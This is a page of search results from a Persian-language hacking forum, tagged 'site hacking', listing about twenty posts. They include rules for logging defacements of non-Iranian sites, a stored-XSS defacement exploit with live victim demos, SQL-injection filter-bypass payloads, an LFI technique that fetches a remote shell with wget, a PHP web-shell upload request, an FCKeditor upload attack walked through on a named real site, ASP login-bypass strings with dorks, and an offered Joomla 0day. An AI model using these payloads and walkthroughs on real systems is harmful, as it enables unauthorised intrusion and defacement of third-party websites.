• Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

جستجو در تالار: در حال نمایش نتایج برای برچسب های 'هک سایت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالار ها

  • انجمن های فعال
    • قوانین و اطلاعیه های سایت
    • سوال و جواب های عمومی
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • اخبار هک و امنیت
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • انجمن نفوذ و امنیت
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

59 نتیجه پیدا شد

  1. درود در این بخش لینک اثبات کلیه سایتهای هک شده توسط تیم امنیتی گارد ایران قرار می گیرند و نکات زیر رو دوستان جهت ثبت و قرار دادن لینک باید رعایت کنند : 1- هک سایتهای ایرانی ممنوع بوده و به هر عنوان به شدت برخورد خواهد شد . 2- بنام تیم امنیتی گارد ایران ثبت شوند ( در هنگام ثبت به این نام : Guardiran Security Team ) و ضمنا دوستانی که تعداد دیفیس بیشتری بنام تیم امنیتی گارد ایران داشته باشند عضو تیم دیفیس خواهند شد . با آرزوی سربلندی و موفقیت برای تمامیه اعضاء محترم تیم امنیتی گارد ایران .
  2. * Title : SadafBlog Script Cross Site Scripting ( Xss Stored ) * Date : 6/19/2017 * Dork : inurl:list.php intitle:فهرست وبلاگ ها * Author : GIST * YouTube : https://youtu.be/a1hN9KC3wUQ * Version : All Version * Script Download : https://goo.gl/d7yDrt * Vendor HomePage : - * Tested On : Windows 10 About Script : Sadaf Blog SCript for blogs is beautiful and diverse capabilities including the ability to recruit blogs, etc. Some Of Facilities Of Sadaf Blog Script : 1-Allowing verification of reader comments to display 2-Assign a URL 3-The possibility of exclusive design templates or change in form, color and design blog 4-Ability to insert labels for each entry 5-Allocates 300 MB for upload in the blog admin panel And ... Exploit : 1- Open Target 2- Register A New Weblog ( Usually You Can Find It 'register' or 'register.php' ) 3- Complet Fields. 4- In Field Of Title Weblog Have To Use Inspect Element To Removing restrictions Of Character Delete This Part ' maxlength="60" ' 5- Input Your Deface Page in Title WEblog Filed 6-Click Save And Go To List Of Weblogs ( Usually You Can Find It 'list' or 'list.php' ) 7- You Will See Your Deface Page :) Demo : http://raziblog.ir/ http://shikblog.ir/ http://7blog.ir/ https://cxsecurity.com/issue/WLB-2017060128
  3. با عرض سلام. با آموزش باگ امنیتی نسبتا جدیدی در وردپرس نسخه 4.7 و 4.7.1 و 4.7.2 در خدمت شما هستیم. این آسیب پذیری با نام Wp COntent Injection یا Wp Reset API شناخته میشه.آسیب پذیری از سطح بالایی برخورداره به طوری که میتونیم بدونیم دسترسی به پنل ادمین سایت پست هارو ویرایش کنیم. من در آموزش از یک اکسپلویت به زبان پایتون استفاده میکنم و در فایل زیپ براتون قرار میدم. امیدوارم پست مفید واقع بشه. موفق باشید Exploit.rar Wp.part2.rar Wp.part1.rar
  4. با سلام. با آموزش باگ امنیتی Vbulletin RCE در خدمت شما هستیم. در این آسیب پذیری از یک اسکریپت پایتون استفاده میکنیم و اقدام به آپلود شل میکنیم. امیدوارم از آموزش لذت ببرید. موفق باشید RCE.rar
  5. سلام دوستان امروز میخوایم با متد های جالب و بایپس ارور ها در sql injection کار کنیم اول اینکه ما فرض رو بر این میگیرم که شما sqli رو کامل بلدید و فقط نمیتونید بعضی جاهایی که ادمین سایت برای امنیت یه سد هایی رو سر راه ما گزاشته رو بایپس کنیم میریم سراغ آموزش بعد از اینکه ' رو گزاشتیم و صفحه مثل بار اول لود نشد(حالا هرطور دیگه ای.ارور sql .ریدایرکت شدن و...) اولین جایی که ممکنه تو sqli گیر بیفتیم زمانیه که میخوایم ستون هارو پیدا کنیم مثلا target.xxx/index.php?view=blog-detail&newsId=8 تارگت ماست حالا ما میخوایم ستون هاشو بدست بیاریم به این صورت http://target.xxx/index.php?view=blog-detail&newsId=8+order+by+9999-- شاید هر عددی هم که بزاریم باز سایت لود بشه پس بایپس میکینم خب برای اینکه این مشکل رو حل کنیم جلوی value یا همون عدد پشت =یه کوتیشن میذاریم و جلوی اون -- یه+ قرار میدیم و میبینیم مشکل به سادگی حل شد حالا ستون هارو بدست اوردیم http://target.xxx/index.php?view=blog-detail&newsId=8'+order+by+9999--+ به این صورت حالا ستون هاشو بدست اوردیم به طور مثال 8 تا بود حالا بعضی وقتا میبینیم که این کارو کردیم اما دیگه حتی با 1 هم لود نمیشه و ارور میده اینجاس کهه باید بجای order از کلمه group استفاده کنیم که دیگه مطمعنن این سری مشکل رفع میشه اما بعضی وقتا مشکل اساسیه و ارور forbidden میده و اصلا چیزی لود نمیکنه اینجاس که دوباره بایپس لازم میشیم اولین کاری که میکنیم اینه که بجای+--newsId=8'+order+by+9999 http://target.xxx/index.php?view=blog-detail&newsId=8+/*!50000order*/+by+9999-- رو تست میکنیم اگه باز هم نشد برای by هم این رو اضافه میکنیم احتمال زیاد حل میشه اگر باز هم نشد بجای -- عبارت %23 قرار میدیم اگر نشد حروف by / order رو بزرگ میکنیم اگه عمل نکرد میرسیم به اخرین راه قبل از کلمه order /**x**/ x میتونه هر حرفی باشه اضافه می کنیم اگر باز هم ارور داد از جلوی order پاک میکنیم و جلوی by میاریمشکه این سری به احتمال 99 درصد جواب میده خب فکر کنم زیاد طولانی شد ادامه جلسه برای هفته بعد تا خسته نشید تشکر یادتون نره
  6. با سلام خدمت شما دوستان گرامی بعد از این که متوجه ی این شدم که اموزش های سیستم عامل کالی لینوکس در انجمن دیگر گذاشته نمیشود و دوستان میخواهند که اموزش هارو از صفر یاد بگیرن بنا به این شدم که دست به کار بشم و با کمک دوستان عزیز در انجمن اگر نواقصی دیدن در تاپیک ها کمک کنن تا بر طرف بشه..... دوستان تازه کار و مدیران شبکه و حتی یا وبمستران هم میتوانند از این اموزش ها برای محک زدن امنیت سایت خود استفاده کنند و در صورت مشاهده ی نقطه ی ضعف انرا بر طرف کنند.لطفا از اموزش ها برای افزایش امنیت سایت های خودتون استفاده کنید تا کمتر شاهد هک شدن سایت های ایرانی باشیم. در صورت نیاز به مشاوره و کمک جدی میتونید به صورت پیام خصوصی با ما در تماس باشید. قوانین تاپیک: اسپم ممنوع(دوستان عزیز چون خود اموزش ها طولانی هست لطف کنین و اسپم ندید در صورت مشاهده با کاربربرخورد میشه) ((سوالات خودتون رو درلینک زیر بپرسین تا به انها خودم و یا دیگر مدیران جواب بدن)) http://guardiran.org/topic/2259-سوالات-مربوط-به-بخش-اموزش-کالی-لینوکس/?p=9251 از قرار دادن اموزش های تکراری پرهیز کنین در صورت گذاشتن ابزاری خاص لینک اسکن فراموش نشود با تشکر فراوان از شما دوستان گرامی
  7. باگ lfi و rfi چیست؟ Lfi چیست : Lfi یا Local File Inclusion یک نوع دسترسی محلی به ما برای مشاهده ی فایل های سرور مورد نظر رو میده. باگ Lfi بیشتر در اشتباهات برنامه نویس در استفاده از توابعی مثل Include ,require() و غیره رخ میده. با استفاده از این باگ حرکت های زیادی میشه کرد از جمله : تبدیل آن به اجرای دستورات از راه دور با استفاده از گزارش های Apache خواندن فایل های مهم سیستمی با فایل های config Rfi : این باگ با بی احطیاتی برنامه نویس در استفاده از توابع Include و … به وجود میاد. در اصل این توابع فایل یا صفحه ای رو فراخوانی میکنن که اگر روی این درخواست کنترولی نباشه میتونه مونجر به باگ Rfi یا حتی Lfi بشه. بعد از پیدا کردن باگ میرسیم به خوانده فایلهای مهم مثل : etc/passwd که اکثرا به شکل زیر می باشد : …/…/…/…/etc/passwd%00 Or etc/;cat passwd%00 و در صورت دادن خطا به جای cat از کاراکترهای more , less , … استفاده نمائید. نحوی آپلود شل : به جای etc/passwd عبارت proc/self/environ%00 را وارد نمائید و سپس : ../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget http://shelinizinadresi.com/tools/bd/fxshell.txt -O scroll.php بعد از wget مسیر شل رو بهش میدید اکثر این باگ ها در میان پلاگینهای Joomla , وردپرس پیدا میشه . نمونه کدی که باعث ایجاد چنین باگی میشه : echo "<b><br><br>" . php_uname() . "<br></b>"; echo "<form action='' method='post' enctype='multipart/form-data' name='uploader' id='uploader'>"; echo "<input type='file' name='file' size='50″><input name='_upl' type='submit' id='_upl' value='Upload'></form>"; if ($_POST['_upl'] == "Upload") { if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo "<b>Upload!!!</b><br><br>"; } else { echo "<b>Upload !!!</b><br><br>"; } نحوه شناسایی باگ LFI در کد های PHP و تشخیص آسیب پذیری برای هک سایت بخش اول – تشخیص آسیب پذیری : این باگ در کدهای دیده میشود که درخواست فراخوانی یک فایل رو دارند. همونطور که از اسمش هم پیداست اجازه ی دسترسی به فایلهای روی سرور رو به ما میدهد که این فایل ها ممکنه که اطلاعات مهم و حساسی رو در خودشون ذخیره کرده باشند. برای شروع کد PHP زیر رو در نظر بگیرید <?php $page = $_GET[page]; include($page); ?> برسی کد: در این کد ساده یه متغییر تعریف شده و سپس از طریق پروتکل HTTP و با دستور GET (برای گرفتن مقدار از طریق URL) مقدار دهی میشه و در انتها با Include که یکی از توابع فراخوانی در PHP هست فراخوانی شده . اینجا باید این مطلب رو اضافه کنم که علاوه بر تابع Include از توابع زیر نیز برای فراخوانی یک فایل در زبان PHP استفاده میشود Include_Once Require Require_once virtual برای تست آسیب پذیری باگLFI باید موارد زیر رو در کد PHP موجود چک کنیم: 1- یکی از توابع ذکر شده بالا در آن وجود داشته باشد. 2- در داخل یکی از توابع بالا متغییر وجود داشته باشد. 3- متغییر از طریق پروتکل HTTP قابل مقدار دهی باشد. 4- شرایط لازم برای رسیدن به خط تابع موجود باشد. خوب می بینیم که در کد بالا تمامی موارد موجود هست: 1- وجود تابع Include 2- وجود متغییر $page 3- مقدار دهی به متغییر از طریق GET 4- تابع در اول برنامه فراخوانی میشود و قبل از آن چیزی وجود ندارد تا مانع اجرای تابع شود. اما در مقابل به این کدها توجه کنید : Exam1: <?php Include (“cloob.com/page.php”); ?> در این مثال هیچ گونه متغییری تعریف نشده است، یعنی شروط ما رعایت نشده است بنابراین این کد آسیب پذیر نیست . $filename = preg_replace("/[^a-z0-9A-Z]/","",$_GET['lang']); include("lang/" . $filename . ".php"); در مورد این مثال، خوب متغییرکه تعریف شده ، از Include هم که استفاده شده ولی دقت کنید که در خط قبلی متغییر ورودی را ف_ی_ل_ت_ر کرده است به این معنا که هرچه از طریق GET مقدار داده شود آنالیز شده و هر کاراکتری غیر از A-Z a-z 0-9 وجود داشته باشد رو حذف میکنه ، پس از این کد هم نمیتوان استفاده کرد.(این یک نمونه کد امن شده میباشد./ آموزش باگ LFI و نحوه پچ آن در خدمت شما هستم… همونطور که می دونید این باگ شبیه به باگ RFI هست با این تفاوت که باگ LFI ضریب خطر کمتری نسبت به RFI داره اما بازهم می تونه بسیار خطرناک باشه… مثلا می شه یوزر های سرور رو فهمید و بروت فورس کرد و یا این باگ رو به باگ RCE تبدیل کرد و… که خودتون بهتر می دونید… اما چگونگی بوجود آمدن این باگ به اونجایی برمی گرده که برنامه شما درخواست یک صفحه رو از url می گیره که این صفحه محدود به خود سرور هست… پس نمی شه از یه سرور دیگه فایل تزریق کرد… کد زیر را در نظر داشته باشید: $page=$_GET['page']; include "/pages/".$page; این کد در نظر اول خیلی معمولی به نظر می آد و هیچ مشکلی نداره!! اما وقتی در مرورگر آدرس زیر وارد بشه قضیه فرق می کنه: http://example.com/index.php?page=…../../etc/passwd با این کد نفوذگر به راحتی می تونه به فایل حاوی یوزرها دسترسی پیدا کنه و اون رو بخونه برای بروت فورس !!! همونطور که می دونید باگ lfi باگی هست که شما می تونید فایلهای داخل سرور رو بخونید با دستورات جابجایی بین پوشه های لینوکس و همینطور که می دونید برای بازگت به پوشه های قبل باید از کاراکتر های ” . ” و ” / ” استفاده کرد حالا اگه ما بیایم و از وارد شدن این کاراکتر ها جلوگیری کنیم مشکل می تونه حل بشه ! مثال: $pagina=$_GET['page']; $page=Replace($page, ".", ""); $page=Replace($page, "/", ""); include "/pages/".$page; دوستان این یک نمونه هست که میشه داده های ورودی رو فیلتر کرد… اگه خلاقیت باشه و فکر می شه خیلی راحت نمونه های بیشتری رو بکار برد… همونطور که مي دونيد اغلب وب سايتها امکان آپلود فايل دارند و اين يعني اينکه کاربر مي تونه فايل هاي خودش رو برروي سرور انتقال بدهد… و اگه موارد امنيتي بدرستي رعايت نشه مي تونه فاجعه باشه! به طور مثال کد زير قطعه کدي است براي آپلود فايل سيستم به سرور: $uploaddir = "uploads/"; // Relative path under webroot $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; } else { echo "File uploading failed.\n"; } که فايل ها رو که از سمت کاربر آمده در مسير مربوطه قرار مي ده… قطعه کد زير نيز کدي است که در سمت کاربر فايل رو براي سرور مي فرسته: <form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/formdata"> Select the file to upload: <input type="file" name="userfile"> <input type="submit" name="upload" value="upload"> </form> با بررسي کد بالا در پي مي بريم که بدون هيچ ***** و کنترلي فايل برروي سرور انتقال ميابد… حال فرض کنيد اين فايل يک فايل php که حاوي کدهاي مربوط به شل کد هست باشه! نتيجه اينکه نه تنها سايت خودتون بلکه سرور هم دودستي در اختيار نفوذگر قرار داديد… همونطور که قبلا هم گفتم کد بالا یک کد آپلود ساده بدون اعمال هیچ فیلتری است… پس به راحتی می توان شل خودمون رو آپلود کنیم… اما حالا وقتی که ما این شل را به سمت سرور ارسال می کنیم چه اتفاقی می افته؟؟ هدر ارسال شده رو می بینیم: POST /upload1.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Length: 156 Content-Type: multipart/form-data; boundary=xYzZY –xYzZY Content-Disposition: form-data; name=”userfile”; filename=”shell.php” Content-Type: text/plain <?php system($_GET['command']); ?> –xYzZY– HTTP/1.1 200 OK Date: Wed, 13 Jun 2007 1232 GMT Server: Apache X-Powered-By: PHP/4.4.4-pl6-gentoo Content-Length: 48 Connection: close Content-Type: text/html File is valid, and was successfully uploaded. بله همونطور که انتظار می رفت سرور تایید کرده… که بعد از اجرای این کد بصورت زیر می توان به اعمال هکری خود پرداخت: http://localhost/uploads/shell.php?command=id uid=81(apache) gid=81(apache) groups=81(apache) اولین مرحله از فیلتر گذاری رو می خوام کار کنیم… در این مرحله اسکریپت چک می کنه که محتویات فایل چی هست و در واقع در این نوع فیلتر گذاری نوع فایل رو مورد بررسی قرار می دیم. برای مثال اگه سیاست سایت ما فقط برای آپلود تصاویر باشه ما در کد این نوع فایل رو اجازه دسترسی میدیم… کد زیر کد فیلتر گذاری شده بر این نوع هست که فقط به نوع تصویر اجازه آپلود شدن می دهد: if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; } $uploaddir = "uploads/"; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; به قسمت اول این کد توجه کنید: if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; همونطور که متوجه شدید در این قسمت کد چک می کنه که ساختار فایل image/gif اینجوری باشه و اگر غیر از این بود از آپلود ممانعت به عمل میاد…
  8. سلام دوستان .. درود من یک سایتی رو اسکن کردم و فهمیدم که باگ sql injection داره .. توی آموزش های انجمن هم درست توضیح ندادن که بفهمیم باید چیکار کنیم و الان من نمیدونم چجوری باید این سایت رو بزنمش.. توی آموزش ها به این شکل گفته شده .. www.example.com/news.php?id=1 .... من هرکاری میکنم نمیدونم این قسمت رو (news.php?id=1) باید از کجا پیداش کنم...اصلا این چی هست؟؟ چجوری باید این id رو پیدا کنم ؟ اون سایتی که من اسکنش کردم با وردپرس ساخته شده ممنون میشم اگر راهنمایی کنید و یا یک سایتی رو به همین روش بزنید و به صورت تصویری پست کنید توی انجمن..
  9. با سلام خدمت تمامی همراهان عزیز چون آموزش تصویری و آپلود کردن تصاویر در وب سایت و چیدمان سخت و دشوار است یک وب سایت به شما معرفی کردم.با این سیستم عامل میتونید به انجام تست نفوذ و محک زدن امنیتسیستم گوشی و حتی سرور ها بپردازید!!! http://day.ir/articles/virtualmachine/Kali-Linux بفرمایین اگه استفاده کردین تشکر کنین.
  10. با سلام اینم فایل txt از دورک های اس کیو ال نسبتا کامل
  11. خب برای هک سایت های دارای این باگ اول باید اونها رو پیدا کنید این کار رو با استفاده از دورک گوگل زیر انجام میدیم یعنی دورک زیر رو در گوگل جستجو میکنیم: inurl:"editor/filemanager/connectors/php/userfiles/" بعد روی چنتا سایت دلخواه از بین سایت های جستجو شده کلیک میکنیم (شاید همه باگ نداشته باشند(باگ:حفره ی امنیتی)) من از بین سایت های جستجو شده تارگت(سایتی که میخایم هک کنیم) رو انتخاب میکنم: movingsouls.com خب ما وقتی این سایت رو از گوگل باز میکنیم url اون به شکل زیر هستش http://movingsouls.com/admin/fckeditor/editor/filemanager/connectors/php/userfiles/casino-progressive-slot-machines-8339.xml خب روش کار به این صورته که بعد از آدرس اصلی سایت که با رنگ قرمز مشخص کردم اگه admin/ بود تمام چیز های بعد از admin رو پاک میکنید و متن زیر رو به جاش کپی میکنید: /fckeditor/editor/filemanager/connectors/uploadtest.html که یعنی به این شکل بشه (قسمت زرد رنگ رو به جای قسمت سبز قرار میدیم): http://movingsouls.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html اگر هم admin نداشت تمام جیز ها بعد از ادرس سایت رو پاک میکنیم و قسمت قرمز رنگ رو بعد از آدرس قرار میدیم اگه کار ها رو درست انجام داده باشید این صفحه براتون باز میشهبرای بزرگ شدن عکس روی آن کلیک کنید) شما باید در این صفحه روی قسمت ASP کلیک کنید و PHP رو به جای اون انتخاب کنید به بقیه قسمت ها هم کاری نداشته باشید در قسمت Upload a new file روی Browse کلیک کنید و یک فایل با فرمت txt یا یک عکس رو انتخاب کنید (در فایل txt میتونید هر متنی رو قرار بدید) بعد روی send it to the server کلیک کنید بعد از این کار در کادر Uploaded File URL آدرس فایل آپلود شده است که فقط باید آن را کپی کنید و بعد از آدرس سایت قرار دهید مثلا آدرسی که در کادر برای من نمایش داده شد اینه: /admin/fckeditor/editor/filemanager/connectors/php/userfiles/idlc_tk.txt وقتی آون رو جلوی آدرس اصلی سایت قرار میدم میشه این http://movingsouls.com/admin/fckeditor/editor/filemanager/connectors/php/userfiles/idlc_tk.txt حالا آگر شما به این ادرس برید متن این سایت هک شد رو میبینید
  12. با سلام با دوره ی ویژه کالی لینوکس درخدمتتون هستم بنده به شخصه دوره های کمی را در سطح اینترنت دیده ام که دوره کامل کالی لینوکس را گذاشته باشند از تمامی دوستان خواهشمند هستم تا برای افزایش کیفیت اموزش ها نظرات خودشان را درباره هر قسمت به بنده در پیام خصوصی اعلام کنند ان شالله که دوستان به خوبی حمایت کنند و بنده را نیز دلگرم اموزش ها اختصاصی تیم امنیتی گارد ایران می باشد کیفیت قسمت ها: خوب صدا: دارد زبان: فارسی پسورد:guardiran.org
  13. با سلام. یکی از باگ ها (ضعف امنیتی) شناختخ شده در میان هکر ها sql injection میباشد .متاسفانه این باگ در بیشتر سایت های اسیب پذیر یافت میشه و میتوان به جرات گفت که یکی از خطرناک ترین باگ های شناخته شده هست!!!!شما میتونید با استفاده از ابزار sqlmap در سیستم عامل کالی لینوکس سایت خودتون رو محک بزنید که ایا این اسیب پذیری در سایت شما هم وجود داره یا خیر.... خوب چون تاپیکی که در این رابطه زده شده بود ادامه پیدا نکرد یک آموزش جامع براتون آماده کردم. امیدوارم از این آموزش نهایت بهره رو برده باشید یا علی pass:guardiran.org sqlmap-hacking.part1.rar sqlmap-hacking.part2.rar
  14. با سلام بیشتر وبمستران برای محافظت از پسورد وبسایت خود پسورد هارو به صورت هش ذخیره میکنند.در این اموزش شما رو با یکی از ابزار های تست امنیت اشنا میکنم که بسیار کاربردی هست....در این آموزش تصویری شما رو با کرک هش hash توسط یکی از ابزارهای کالی kali به نام findmyhash آشنا میکنم findmyhash یکی از قدرتمند ترین ابزار موجود جهت کرک انواع هش موجود هستش ازدست ندیدو از اون برای ایمن سازی سایت های خودتون استفاده کنید... پسورد: guardiran.org FINDMYHASH.rar
  15. با سلام خدمت همه دوستان این تاپیک واسه ی هکرهای تازه واردیه که سوالات و مشکلات زیادی دارن دوستان قوانین تاپیک به صورت زیره لطفا رعایت کنید قبل از پرسیدن سوالی اول توی انجمن جست و جو کنید بعد اگه سوال یا مشکلی داشتید اینجا مطرح کنید لطفا سوالاتی از قبیل" چگونه هکر بشم" یا" چطوری هک کنم" نپرسید پست اسپم ندید و فقط سوال و جوابهاتونو بفرستید برای تشکر از دکمه تشکر استفاده کنید و پست ارسال نکنید اگه میخواهید از انجمن و یا کاربر خاصی نقد کنید توی این تاپیک نباشه و در جای مخصوص خودش و یا در پیام خصوصی با مدیران مطرح کنید در صورت پرسیدن سوال 24 ساعت صبر کنید در صورت نگرفتن جواب دوباره سوال کنید و تاپیک رو بالا بیارید با تشکر از همه دوستان
  16. با سلام آموزش تصویری کار با اسکنر قدرتمند Vega رو در کالی لینوکس برای شما ضبط کردم و فیلم بهمراه توضیحات هست و از این اسکنر برای اسکن آسیب پذیری تارگت( ُScanner Target Vulnerability ) می تونید استفاده کنید .این اسکنر یکی از بهترین اسکنر های رایکان برای تشخیص اسیب پذیری های شناخته شده هست و 100 در 100 به افزایش امنیت سایت های شما کمک میکنه.... امیدوارم که از این اموزش نهایت استفاده رو ببرید پسورد : guardiran.org VEGA Scanner Kali Linux.rar
  17. با سلام امروز یک آموزش ویژه براتون آوردم شما با این روش بدون داشتن نام کاربری و رمز عبور ادمین به سایت نفوذ میکنید ..! این روش فقط روی سایت های asp جواب میده . برای شروع یه سری دورک براتون میذارم . دورک ها : دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تردر موتور های جستجو گر از آن استفاده میکند. "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" خب این از دورک ها . اینم از نام کاربری و رمز ها : '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1-- دقت داشته باشید اگر نام کاربری '=' 'or' باشه پسورد هم '=' 'or' هستش برای مثال نام کاربری : '=' 'or' پسورد : '=' 'or' ================================================== نام کاربری : 'or ' 'x'='x رمز : 'or ' 'x'='x ================================================== خب اگر همه رو امتحان کنید جواب میده. اینم بگم که این ها روی 90% از سایت های asp جواب میدن موفق و پیروز باشید
  18. خبرگزاری اسپوتنیک (Sputnik) روسیه در گزارش خود از حمله به وب سایت خبری راشاتودی خبر داد. گزارش ها حاکی از آن است که هیچ گونه آسیبی به سرور اصلی خبرگزاری وارد نشده است. هکرها برای اجرای این حمله بارها و بارها با دقت زیرساخت های شبکه و مکانیزم های امنیتی آن را مورد بررسی قرار دادند. کارشناسان امنیتی پس از اتمام این حمله به بررسی فعالیت حمله پرداختند و در ادامه تحقیقات خود اعلام کردند که حمله صورت گرفته از حملات مخرب برای زیرساخت های شبکه ای به شمار نمی رود. حمله صورت گرفته روی وب سایت این خبرگزاری در دو بخش راه اندازی و اجرا شد که در بخش اول این حمله، مرکز اطلاعات آمریکا و اروپا شبکه مورد هجوم هکرها قرار گرفت. در بخش دوم این حمله نیز، بخش مرکزی اطلاعات مسکو شبکه مورد هجوم قرار گرفت. این حمله تا ساعت 2:20 بامداد ادامه داشت. کارشناسان معتقدند که حمله صورت گرفته روی سخت افزار سرور تأثیرات منفی نداشته است اما روی ظرفیت ترافیک اطلاعات تأثیر قابل توجهی اعمال کرده است. از این حمله به عنوان اولین حمله زیرساخت های رسانه ای یاد نمی شود. وب سایت این شبکه پیش از این، بارها و بارها مورد هجوم حملات سایبری قرارگرفته که یکی از قدرتمندترین حملات صورت گرفته روی وب سایت این خبرگزاری در 18 فوریه 2013 انجام شد. در پی آن حمله، وب سایت شبکه حدود شش ساعت از دسترس خارج شد. همچنین در سال 2012 بخش های انگلیسی و اسپانیایی راشاتودی در سال 2012 نیز مورد هجوم هکرها قرار گرفت. بررسی ها نشان می دهد حملات صورت گرفته سال های اخیر توسط گروه هکری AntiLeaks روی زیرساخت ها این شبکه خبری صورت گرفته است.
  19. سلام دوستان. براتون یک اکسپلویت 0day آماده کردم از پلاگین Mod_jvTwitter در جوملا که تو هیچ فروم امنیتی وجود نداره وفقط یک فیلم در یوتیوب توسط نویسنده اون موجود هست. امیدوارم لذت ببرید. دقت کنید برای استفاده از این اکسپلویت باید پایتون 2.7 نصب کنید. روش استفاده: اکسپلویت رو در دسکتاپ با نام explit.py قرار میدید.دقت کنید باید پسوند اکسپلویت py. باشد. سپس در cmd دستورات زیر رو وارد کنید. cd Desktop exploit.py website/modules/mod_jvtwitter/jvtwitter.php موفق و پیروز باشید joomla_mod_jvtwitter_0day_exploiter.txt
  20. سلام دوستان من طبق فیلمی که در مورد هک سایت تو انجمن بود پیشرفتم تا اینجا نمیدونم چجوری او فایل اکسپلویتhtmlکه رو صفحه هست از کجا امده چجوری درست شده همونجا گیرمیکنم لطفا راهنمایی کنید دور او فایل htmlکه نمیدونم چیه خط کشیدم
  21. سلام دوستان واستادان کسی اموزش این برنامه رو دقیق نداره تمام سایتای ایرانی خارجی از جمله انجمن اشیانه ووووو خیلی انجمن های دیگه رو گشتم هیچ کس اموزش این برنامه رو بطور دیقیق نداشت تو یوتیوب هم نبود شما استادان کسی یاد نداره لطف کنید اگه دارید اموزشش رو بزارید Acunetix Web Vulnerability Scanner 9
  22. سلام خسته نباشید اگه میشه منو راهنمایی کنید میخوام رمز یه سایتی رو بدست بیارم و واردش بشم و دیفیسم رو بزارم باید چیکار ها بکنم باگ SQL و برنامه هویج به درد نمیخوره زیاد استفاده کردم سایت هایی هم که من میخوام هک کنم باگ SQL ندارن ممنون میشم راهنمایی بکنید لطفا اگه توضیحی میدید کامل باشه مثلا راهنمایی به یه آدرس دیگه نباشه مثلا چه مراحلی داره چه نرم افزار هایی استفاده کنم و... یکم آشنایی با کالی دارم تشکر فراوان یا علی
  23. سلام خدمت همه اساتید من توسط دورک های sqlinjection یه تارگت آسیب پذیر پیدا کردم - توسط ابزار sqlmap تو کالی تونستم دیتابیس سایت رو بدست بیارم و همه جدول هاش رو ببینم.از جمله جدول Users - الان میخوام اطلاعات موجود در جدول Users رو بدست بیارم - جدول Users شمال 6 تا ستونه که من فقط اطلاعات ستون User_name , User_password رو میخوام - اطلاعات ستون User_name راحت بدست میاد . اما اطلاعات ستون User_password انگار رمزنگاری شده چطوری میتونم اطلاعات ستون User_password رو بخونم ؟؟ جدول Users: ستون User_name , User_password:
  24. سلام به همه اگه این تایپیکی که میزارم تکراریه معذرت میخوام. بعضی از فیلما و اخبار و .... هستن که هکر یه سایت رو هک مکنه بعد تو سایت مینویسه "هک شد توسط..." و چتا عکس و اینا آپلوید میکنه تو سایت. دنبال تایپیک میگشتم که هک سایت رو یاد بگیرم ( به طور مقدماتی ) تو چنتا از انجمن ها دنبال آموزش هک سایت میگشتم و بعض هاش رو متوجه نشدم خیلی تخصصی بود یکی هم با استفاده از sqlmap تو کالی لینوکس بود ولی ضاهرن بخواطر اسپم دادن و ... متوقف شده بود. اگه کسی از دوستان آمورش مقدماتی رو سراغ داره ممنون میشم اگه معرفی کنه بازم بخواطر ایچاد این تایپک معذرت میخوام. به بزرگی خودتون ببخشید.

درباره ی ما

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.